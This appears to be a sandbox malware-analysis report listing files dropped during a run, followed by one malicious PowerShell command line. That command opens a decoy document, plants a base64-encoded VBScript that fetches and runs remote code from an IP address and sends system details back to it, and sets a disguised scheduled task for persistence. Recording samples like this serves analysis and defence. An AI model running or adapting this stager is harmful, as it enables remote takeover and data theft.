C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Unicode text, UTF-16, little-endian text, with no line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\793b56729a1d5792.customDestinations-ms (copy)

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OYX5ZFQW5EYOI2ETHRZA.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PV1QXCJX256AUXDA1XGY.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

data

dropped

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

JSON data

dropped

There are 234 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\Return.docx -value $fil -encoding byte;&$home\appdata\local\temp\Return.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi94c1NwUWJTT0dIeXpNTHhaL3BhZ2UxNjQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UxNjQnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg0KDQo=';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;

Details

Is windows:	true
Is dropped:	false
PID:	3540
Target ID:	0
Parent PID:	4004
Name:	powershell.exe
Class:	powershell
